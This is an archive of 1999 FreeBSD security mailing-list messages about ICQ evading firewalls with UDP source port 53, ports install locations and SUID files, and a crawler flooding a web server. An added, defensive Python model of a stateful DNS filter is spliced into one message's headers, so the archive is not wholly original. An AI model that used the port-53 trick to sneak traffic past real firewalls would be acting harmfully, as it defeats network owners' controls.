I usually read the Makefile, rather than the source. I also keep a 'tee' of the output from the various make phases. When you install something that is SUID, you will usually hear about it in your nightly mail, another really nice feature of FreeBSD. I can't count how many times I've seen the mail from customer firewalls and been able to remotely diagnose duplicate client IP addresses from the ARP jumps...

> I think you need to learn how the Ports Collection works before you
> condemn it. You clearly do not understand it all.

The ports collection just flat rocks! It's the only thing better than packages. I frequently use the ports to take the first whack at something before I port it to AIX or Linux. My FreeBSD laptop is a good porting tool - Jy@

From owner-freebsd-security Fri Jun 4 2:03:09 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 836F314A09 for ; Fri, 4 Jun 1999 02:03:06 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id LAA03247 for ; Fri, 4 Jun 1999 11:03:03 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: security@freebsd.org Subject: icq using udp port 53 ??
From: Poul-Henning Kamp Date: Fri, 04 Jun 1999 11:03:03 +0200 Message-ID: <3245.928486983@critter.freebsd.dk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

It seems like the ICQ people have started to use udp src port 53 to circumvent firewalls :-(

--
Poul-Henning Kamp FreeBSD coreteam member
phk@FreeBSD.ORG "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Fri Jun 4 2:06:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id E2A6114A09; Fri, 4 Jun 1999 02:06:09 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA28101; Fri, 4 Jun 1999 13:06:13 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Fri, 4 Jun 1999 13:05:16 +0400 Received: from undisclosed-intranet-sender id xma019712; Fri, 4 Jun 99 13:05:16 +0400 Date: Fri, 4 Jun 1999 13:05:03 +0400 Message-Id: <199906040905.NAA10997@paranoid.eltex.spb.ru> In-Reply-To: <3245.928486983@critter.freebsd.dk> from "Poul-Henning Kamp "
From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: icq using udp port 53 ?? To: phk@FreeBSD.ORG Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

You can use forwarding named as proxy..

Poul-Henning Kamp said :

> It seems like the ICQ people have started to use udp src port 53 to
> circumvent firewalls :-(

_ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBN1eWvqH/mIJW9LeBAQHgKgP9GM5QrEyO/z45ANmTI1xJk5cgN+N8sr8f
O8kZJyiZTtEpTYa+WrgRE0bdtYNj3blPFYMcMM4HV0Q8D/XWIZMkkrJgy/CDnwv3
Qa84a8mwxmxSVugMtyaXl7m/MwZSHRIeSlWrklua6uDvQasaztB5Mr57NIPsqbia
fdq7sNNMqwM=
=eZzH
-----END PGP SIGNATURE-----

From owner-freebsd-security Fri Jun 4 8:19:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id 10A9215564 for ; Fri, 4 Jun 1999 08:19:09 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id IAA19422 for ; Fri, 4 Jun 1999 08:19:10 -0700 (PDT) Date: Fri, 4 Jun 1999 08:19:08 -0700 (PDT)
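The ICQ trick Poul-Henning Kamp reports above works against a rule that admits any UDP datagram whose source port is 53, and ark's answer (run a forwarding named and let only it talk to outside DNS) removes the need for such a rule. The block below is an added example for this archive, not code or configuration from anyone in the thread: it models the permissive rule next to a stateful filter that passes inbound port-53 traffic only as the reply to a query the inside actually sent, optionally restricted to one forwarding resolver. The traffic, the addresses (documentation ranges) and the class and function names are constructed for the example.

```python
from dataclasses import dataclass
from typing import Optional, Set, Tuple


@dataclass(frozen=True)
class UdpPacket:
    src: str
    sport: int
    dst: str
    dport: int
    inbound: bool  # True when arriving on the outside interface


def stateless_allow(pkt: UdpPacket) -> bool:
    """The rule being abused: 'allow udp from any 53 to any in'. Whoever sets
    a source port of 53 is let in; nothing checks that an inside host asked."""
    return pkt.inbound and pkt.sport == 53


class StatefulDnsFilter:
    """Admit inbound UDP from port 53 only as the reply to an outstanding
    query. With `resolver` set, only that host may send queries out, so the
    rest of the network needs no port-53 hole at all (ark's forwarding named)."""

    def __init__(self, resolver: Optional[str] = None):
        self.resolver = resolver
        # outstanding queries, keyed (inside host, inside port, outside server)
        self.pending: Set[Tuple[str, int, str]] = set()

    def allow(self, pkt: UdpPacket) -> bool:
        if not pkt.inbound:
            if pkt.dport != 53:
                return True  # non-DNS egress policy is outside this example
            if self.resolver is not None and pkt.src != self.resolver:
                return False  # only the forwarding resolver talks to outside DNS
            self.pending.add((pkt.src, pkt.sport, pkt.dst))
            return True
        if pkt.sport != 53:
            return False
        key = (pkt.dst, pkt.dport, pkt.src)
        if key in self.pending:
            self.pending.discard(key)  # one reply per query; replays are dropped
            return True
        return False


def demo() -> dict:
    """Constructed traffic: a legitimate query/reply pair, a replayed reply,
    and an unsolicited datagram from a server that merely chose port 53."""
    inside, resolver = "10.0.0.5", "10.0.0.2"
    dns, chat_server = "198.51.100.10", "203.0.113.7"  # documentation addresses
    query = UdpPacket(inside, 4000, dns, 53, inbound=False)
    reply = UdpPacket(dns, 53, inside, 4000, inbound=True)
    sneaky = UdpPacket(chat_server, 53, inside, 4000, inbound=True)  # no query behind it

    per_host = StatefulDnsFilter()
    per_host.allow(query)

    via_resolver = StatefulDnsFilter(resolver=resolver)
    r_query = UdpPacket(resolver, 5353, dns, 53, inbound=False)
    r_reply = UdpPacket(dns, 53, resolver, 5353, inbound=True)
    via_resolver.allow(r_query)

    return {
        "stateless_reply": stateless_allow(reply),
        "stateless_sneaky": stateless_allow(sneaky),
        "stateful_reply": per_host.allow(reply),
        "stateful_replay": per_host.allow(reply),
        "stateful_sneaky": per_host.allow(sneaky),
        "resolver_blocks_host_query": via_resolver.allow(query),
        "resolver_reply": via_resolver.allow(r_reply),
        "resolver_sneaky": via_resolver.allow(sneaky),
    }
```

A real stateful filter keys on both ports and times entries out; this model keys on the inside socket and the server and forgets the entry after one reply, which is enough to show why source port 53 alone buys an outsider nothing once state is checked. The resolver variant is the cheaper fix: inside hosts never need inbound UDP from the Internet at all.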
From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >The problem is that we never now what SUID, port will install! Not only "what SUID" but "where" as well. Ports may be one the best things about FreeBSD but there's still _plenty_ of room for improvement. One thing ports don't do well is install themselves in predictable locations. Instead you'll find them installing files in /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec, /var, etc. When I install ssh2 I want it all under /usr/local/ssh. This alone is a good reason to use ports sparingly (after reviewing the patches). This might not seem like a big deal on end-user or non-production systems but it can be a real headache in larger environments where configuration control is important. The only other OS I know of that spreads applications so thinly across the OS is MS Windows. It also effectively prevents FreeBSD from being able to share /usr/local via NFS, as most large installations do. Solaris is the example FreeBSD should be following in this area. /usr/ports/Makefile would be a good place to enforce some predictability, and ideally prompt for things like port_root. Another thing ports don't do is tell you where they install files. "make -n install" or "make -n real-install" rarely yields any useful information. Even the post-install info in /var/db/pkg lacks detail, especially when compared with Solaris' /var/sadm. The FreeBSD operating system is a model of good development. Revision control, code review and well thought out policies make it so. Why is it ports don't receive the same attention to detail? 
--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Fri Jun 4 8:30:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 1BE9F153FE for ; Fri, 4 Jun 1999 08:30:10 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 96087 invoked by uid 1001); 4 Jun 1999 15:30:02 +0000 (GMT) To: marquis@roble.com Cc: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions)
From: sthaug@nethelp.no In-Reply-To: Your message of "Fri, 4 Jun 1999 08:19:08 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Fri, 04 Jun 1999 17:30:02 +0200 Message-ID: <96085.928510202@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> One thing ports don't do well is install themselves in predictable
> locations. Instead you'll find them installing files in
> /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec,
> /var, etc. When I install ssh2 I want it all under /usr/local/ssh.
> This alone is a good reason to use ports sparingly (after reviewing the
> patches).

Having everything under /usr/local/ssh is convenient in many ways, but I don't believe there is any kind of agreement that this is *the* only correct way. Myself, I'm happy to have ssh, ssh-keygen etc. under /usr/local/bin (actually /local/bin here) and sshd under /usr/local/sbin.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Fri Jun 4 8:43:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 96A361543B for ; Fri, 4 Jun 1999 08:43:27 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with SMTP id RAA10592; Fri, 4 Jun 1999 17:41:42 +0200 (MET DST) Date: Fri, 4 Jun 1999 17:41:39 +0200 (MET DST)
From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: sthaug@nethelp.no Cc: marquis@roble.com, security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <96085.928510202@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

A reason that comes to mind is having /usr/local/bin on NFS and ssh not. You need it locally if you want to start sshd from rc* before NFS is mounted.

The problem is however that if you want to make ports customisable you will have to duplicate part of the functionality in ./configure. Are there things like $ETCDIR, $BINDIR, $SBINDIR, etc. in use in the ports collection? That would make it possible to make the make command look like:

    cd /usr/ports/security/ssh2
    make BASEDIR=/usr/local/ssh \
         ETCDIR=/usr/local/etc

Nick

On Fri, 4 Jun 1999 sthaug@nethelp.no wrote:

> > One thing ports don't do well is install themselves in predictable
> > locations. Instead you'll find them installing files in
> > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec,
> > /var, etc. When I install ssh2 I want it all under /usr/local/ssh.
> > This alone is a good reason to use ports sparingly (after reviewing the
> > patches).
>
> Having everything under /usr/local/ssh is convenient in many ways, but
> I don't believe there is any kind of agreement that this is *the* only
> correct way. Myself, I'm happy to have ssh, ssh-keygen etc. under
> /usr/local/bin (actually /local/bin here) and sshd under /usr/local/sbin.
>
> Steinar Haug, Nethelp consulting, sthaug@nethelp.no

--
ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy

From owner-freebsd-security Fri Jun 4 8:48: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 33D41152FB for ; Fri, 4 Jun 1999 08:47:26 -0700 (PDT) (envelope-from rgrimes@gndrsh.aac.dev.com) Received: (from rgrimes@localhost) by gndrsh.aac.dev.com (8.9.3/8.9.3) id IAA21218; Fri, 4 Jun 1999 08:40:25 -0700 (PDT) (envelope-from rgrimes)
From: "Rodney W. Grimes" Message-Id: <199906041540.IAA21218@gndrsh.aac.dev.com> Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <96085.928510202@verdi.nethelp.no> from "sthaug@nethelp.no" at "Jun 4, 1999 05:30:02 pm" To: sthaug@nethelp.no Date: Fri, 4 Jun 1999 15:40:25 +0000 (GMT) Cc: marquis@roble.com, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> > One thing ports don't do well is install themselves in predictable
> > locations. Instead you'll find them installing files in
> > /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec,
> > /var, etc. When I install ssh2 I want it all under /usr/local/ssh.

What does a typical path variable look like on your systems??? Long paths are bad for shells. Yea, I know, the hashing stuff should keep a single copy of a shell pretty quick, but every time you fork off another one you're going to have to go hash the path list.

> > This alone is a good reason to use ports sparingly (after reviewing the
> > patches).
>
> Having everything under /usr/local/ssh is convenient in many ways, but
> I don't believe there is any kind of agreement that this is *the* only
> correct way. Myself, I'm happy to have ssh, ssh-keygen etc. under
> /usr/local/bin (actually /local/bin here) and sshd under /usr/local/sbin.
I would actually rather have sshd in /usr/local/libexec, it's not something you really run from the command line :-)

--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Fri Jun 4 9: 9:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id C4D5214D34 for ; Fri, 4 Jun 1999 09:09:05 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.2) with ESMTP id MAA22134; Fri, 4 Jun 1999 12:04:19 -0400 (EDT) (envelope-from matt@zigg.com) Date: Fri, 4 Jun 1999 12:04:18 -0400 (EDT)
From: Matt Behrens Reply-To: Matt Behrens , freebsd-chat@FreeBSD.ORG To: "Rodney W. Grimes" Cc: sthaug@nethelp.no, marquis@roble.com, security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <199906041540.IAA21218@gndrsh.aac.dev.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

[ This is not really -security related anymore. Can't think of a ]
[ good place to move it so followups are directed to -chat. ]

On Fri, 4 Jun 1999, Rodney W. Grimes wrote:

: What does a typical path variable look like on your systems??? Long
: paths are bad for shells. Yea, I know, the hashing stuff should keep
: a single copy of a shell pretty quick, but every time you fork off
: another one you're going to have to go hash the path list.

Well, why not do what I do -- I have /opt/packagename/bin, /opt/packagename/sbin, etc. and I simply do this after installing a package:

    cd /opt/bin;ln -s ../*/bin/* .

Then we can just add /opt/bin to our paths. We still keep things nice and separate, and if we want to clean up dead symlinks, we just do rm /usr/bin/* then rerun the symlink generator.

: I would actually rather have sshd in /usr/local/libexec, it's not something
: you really run from the command line :-)

I heartily agree with this, except I put mine in /opt/sshd/libexec with symlinks to /opt/libexec :-)

In case anyone wonders why I use /opt, well, I feel /usr/local should stay the property of the actual local software that I develop.
Matt Behrens
Owner/Administrator, zigg.com
Chief Engineer, Nameless IRC Network

From owner-freebsd-security Fri Jun 4 9:25:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id C3EEF14D77 for ; Fri, 4 Jun 1999 09:25:10 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id JAA20049 for ; Fri, 4 Jun 1999 09:25:11 -0700 (PDT) Date: Fri, 4 Jun 1999 09:25:08 -0700 (PDT)
From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <199906041540.IAA21218@gndrsh.aac.dev.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> What does a typical path variable look like on your systems??? Long
> paths are bad for shells. Yea, I know, the hashing stuff should keep
> a single copy of a shell pretty quick, but every time you fork off
> another one you're going to have to go hash the path list.

For applications like ssh, with less than a couple dozen files total, we don't even bother to create subdirectories for sbin, bin, etc. The "configure" command line typically looks like:

    ./configure --prefix=/var/ssh --bindir=/var/ssh \
      --exec-prefix=/var/ssh --sbindir=/var/ssh --sysconfdir=/var/ssh \
      --with-etcdir=/var/ssh --without-rsh

It would be nice if these variables could be set globally i.e.,

    %grep PREFIX /usr/ports/Makefile
    PREFIX= prompt_for
    #PREFIX=
    %grep ETCDIR /usr/ports/Makefile
    ETCDIR= $PREFIX/etc
    #ETCDIR= /usr/local/etc
    ...

Our particular setup installs under /var since /usr/local is an NFS mount. Ssh, scp and sftp are kept in users' paths with symlinks i.e.:

    ln -s /var/ssh/ssh /usr/local/bin/ssh
    ln -s /var/ssh/scp /usr/local/bin/scp
    ln -s /var/ssh/ssh-keygen /usr/local/bin/ssh-keygen

This allows us to maintain a uniform /usr/local while accommodating local differences. It scales nicely up to several hundred hosts and reduces sysadmin overhead by orders of magnitude.
--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Fri Jun 4 9:49:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 874E015363 for ; Fri, 4 Jun 1999 09:49:36 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id TAA07550; Fri, 4 Jun 1999 19:49:23 +0300 (EEST) Date: Fri, 4 Jun 1999 19:49:23 +0300 (EEST)
From: Narvi To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 4 Jun 1999, Roger Marquis wrote:

> >The problem is that we never know what SUID, port will install!
>
> Not only "what SUID" but "where" as well. Ports may be one of the best
> things about FreeBSD but there's still _plenty_ of room for
> improvement.
>
> One thing ports don't do well is install themselves in predictable
> locations. Instead you'll find them installing files in
> /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec,
> /var, etc. When I install ssh2 I want it all under /usr/local/ssh.
> This alone is a good reason to use ports sparingly (after reviewing the
> patches).
>

Ever tried changing the PREFIX?

    make PREFIX=/usr/local/ssh all install

Should most probably do the trick.

[snip]

> Another thing ports don't do is tell you where they install files.
> "make -n install" or "make -n real-install" rarely yields any useful
> information. Even the post-install info in /var/db/pkg lacks detail,
> especially when compared with Solaris' /var/sadm.
>

That is what you have the PLIST for.

> The FreeBSD operating system is a model of good development. Revision
> control, code review and well thought out policies make it so. Why is
> it ports don't receive the same attention to detail?
>

They don't? Go ahead and make a better ports system. But note that it must remain as easy to contribute as it is, the present system must be convertible over to it with relative ease and most importantly, it must actually change something for better.

> --
> Roger Marquis
> Roble Systems Consulting
> http://www.roble.com/
>

Sander

There is no love, no good, no happiness and no future - all these are just illusions.
From owner-freebsd-security Fri Jun 4 10:38: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id 0BE9814D4E for ; Fri, 4 Jun 1999 10:38:04 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.2) with ESMTP id NAA22407; Fri, 4 Jun 1999 13:36:32 -0400 (EDT) (envelope-from matt@zigg.com) Date: Fri, 4 Jun 1999 13:36:32 -0400 (EDT)
From: Matt Behrens Reply-To: Matt Behrens , freebsd-ports@FreeBSD.ORG To: Narvi Cc: Roger Marquis , security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

[ Followups to -ports. ]

On Fri, 4 Jun 1999, Narvi wrote:

: Ever tried changing the PREFIX?
:
: make PREFIX=/usr/local/ssh all install
:
: Should most probably do the trick.

Yep. Works on maybe half the ports. Some override PREFIX themselves; some have commands with /usr/local hardcoded in; some packages even ignore configure command-line switches to change their paths, preferring /usr/local.

: > Another thing ports don't do is tell you where they install files.
: > "make -n install" or "make -n real-install" rarely yields any useful
: > information. Even the post-install info in /var/db/pkg lacks detail,
: > especially when compared with Solaris' /var/sadm.
: That is what you have the PLIST for.

The PLIST that comes out of ports is usually a pretty poor representation of what is actually installed. For fun sometime, you should try installing a lot of ports then uninstalling them. Check out what's left over in /usr/local (ignoring, of course, the locale directories and other things created by the ports system itself rather than the individual ports.)

I can understand how difficult it would be to actually determine what a port did install, especially since different configurations can even generate different file manifests. I don't fault the ports people -- throwing everything into a single directory structure like they come preconfigured to do is difficult to work with and track.

(Actually, I really have great respect for what the ports people do. Please, don't misconstrue me, anyone.)
:-)

Matt Behrens
Owner/Administrator, zigg.com
Chief Engineer, Nameless IRC Network

From owner-freebsd-security Fri Jun 4 10:54: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp11.bellglobal.com (smtp11.bellglobal.com [204.101.251.53]) by hub.freebsd.org (Postfix) with ESMTP id 53306150A6 for ; Fri, 4 Jun 1999 10:53:52 -0700 (PDT) (envelope-from bryanf@geisha.apt.samurai.com) Received: from geisha.apt.samurai.com (HSE-TOR-ppp37150.sympatico.ca [209.226.141.217]) by smtp11.bellglobal.com (8.8.5/8.8.5) with ESMTP id NAA16007; Fri, 4 Jun 1999 13:56:40 -0400 (EDT) Received: (from bryanf@localhost) by geisha.apt.samurai.com (8.9.1a/8.9.1) id NAA01259; Fri, 4 Jun 1999 13:53:50 -0400 (EDT) Date: Fri, 4 Jun 1999 13:53:49 -0400
From: Bryan Fullerton To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990604135349.C1032@samurai.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: ; from Roger Marquis on Fri, Jun 04, 1999 at 08:19:08AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, Jun 04, 1999 at 08:19:08AM -0700, Roger Marquis wrote:
> >The problem is that we never know what SUID, port will install!
>
> Not only "what SUID" but "where" as well. Ports may be one of the best
> things about FreeBSD but there's still _plenty_ of room for
> improvement.
>
> One thing ports don't do well is install themselves in predictable
> locations. Instead you'll find them installing files in
> /usr/local/etc, /usr/local/bin, /usr/local/sbin, /usr/local/libexec,
> /var, etc. When I install ssh2 I want it all under /usr/local/ssh.
> This alone is a good reason to use ports sparingly (after reviewing the
> patches).

Agreed, though I don't mind ssh being dropped in /usr/local/bin and /usr/local/sbin, since that's where the non-port install drops them. I do prefer the config stuff to be put in /etc/ssh2 instead of /usr/local/etc/ssh2, though - I'm not sure if this is a compile time option or not (I'll admit, I haven't checked - it's not *that* big a deal for me).

However, both ssh ports are a version behind, and that version was released on May 13th. Is there an update in the pipe somewhere?

Bryan

--
Bryan Fullerton http://www.samurai.com/
Core Competency Samurai Consulting
"No, we don't do seppuku."
Can you feel the Ohmu call?
From owner-freebsd-security Fri Jun 4 11: 7:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 9B72A14C01; Fri, 4 Jun 1999 11:07:37 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id OAA05348; Fri, 4 Jun 1999 14:10:26 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Fri, 4 Jun 1999 14:10:26 -0400 (EDT)
From: Bill Fumerola To: Matt Behrens , freebsd-ports@FreeBSD.ORG Cc: Narvi , Roger Marquis , security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 4 Jun 1999, Matt Behrens wrote:

> Yep. Works on maybe half the ports. Some override PREFIX themselves;
> some have commands with /usr/local hardcoded in; some packages even
> ignore configure command-line switches to change their paths,
> preferring /usr/local.

send-pr(1)

> The PLIST that comes out of ports is usually a pretty poor
> representation of what is actually installed. For fun sometime,
> you should try installing a lot of ports then uninstalling them.
> Check out what's left over in /usr/local

send-pr(1)

We try to make these things conform. If you find one(s) that doesn't, please tell us. It's normally a simple patch.

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Fri Jun 4 11:43:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.aussie.org (hallam.lnk.telstra.net [139.130.54.166]) by hub.freebsd.org (Postfix) with ESMTP id 2BE0D14DC8 for ; Fri, 4 Jun 1999 11:43:17 -0700 (PDT) (envelope-from cconel@aussie.org) Received: from frankenputer (dialup-b1-29.aussie.org [203.29.75.73]) by mail.aussie.org (8.9.0/8.9.0) with SMTP id EAA08014 for ; Sat, 5 Jun 1999 04:43:15 +1000 (EST) Message-Id: <199906041843.EAA08014@mail.aussie.org>
From: "Chris " To: "security@FreeBSD.ORG" Date: Sat, 05 Jun 1999 04:42:40 +1000 Reply-To: "Chris" X-Mailer: PMMail 98 Standard (2.01.1600) For Windows NT (4.0.1381;4) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Net abuse/DOS with Teleport Pro ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Upon processing my logs for the past few days, I noted an anomaly with regard to one particular directory. I checked out the logs manually.

During two periods over two days, a person using an agent that identified itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web server (at a rate of roughly one per second), repeatedly asking for the same (or similar) rubbish URL, as such ...

    /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=D
    /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=A
    /Docs/?S=A?M=A?N=A?S=D?N=A?S=D?S=M

and a number of variations of this. All came from the same IP address.

I have not used this software and am unaware of its abilities, but I am amazed that any responsible firm would distribute software that could be so easily abused in this way. What it is doing seems, to me, to be either a user doing something silly, or a bug in teleport pro (more likely the latter).

Anyone seen this ?
-- Chris

From owner-freebsd-security Fri Jun 4 14: 8:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from dfw-ix10.ix.netcom.com (dfw-ix10.ix.netcom.com [206.214.98.10]) by hub.freebsd.org (Postfix) with ESMTP id 17EA815B14 for ; Fri, 4 Jun 1999 14:08:53 -0700 (PDT) (envelope-from scaturan@ix.netcom.com) Received: (from smap@localhost) by dfw-ix10.ix.netcom.com (8.8.4/8.8.4) id QAA03798; Fri, 4 Jun 1999 16:07:57 -0500 (CDT) Received: from nwf-nj28-13.ix.netcom.com(198.211.22.205) by dfw-ix10.ix.netcom.com via smap (V1.3) id rma003605; Fri Jun 4 16:06:17 1999 Message-ID: <3757F92A.1AA9FA9B@ix.netcom.com> Date: Fri, 04 Jun 1999 17:04:58 +0100
From: steve caturan Organization: http://www.websytes.org X-Mailer: Mozilla 4.5 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Chris Cc: "security@FreeBSD.ORG" Subject: Re: Net abuse/DOS with Teleport Pro ? References: <199906041843.EAA08014@mail.aussie.org> Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

howdy,

i believe Teleport Pro is quite similar to BlackWidow ( softbytelabs.com or softbytelab.com)..which is a "webspider". A "site leecher" basically...used by many scan-collectors to leech off pics, zip, mp3s and so on from various websites without having to necessarily use a browser.

steve caturan (chye-fhut)
scaturan@ix.netcom.com

Chris wrote:
>
> Upon processing my logs for the past few days, I noted an anomaly with regard
> to one particular directory. I checked out the logs manually.
>
> During two periods over two days, a person using an agent that identified
> itself as 'Teleport Pro/1.26' made over ---THIRTY THOUSAND--- hits on my web
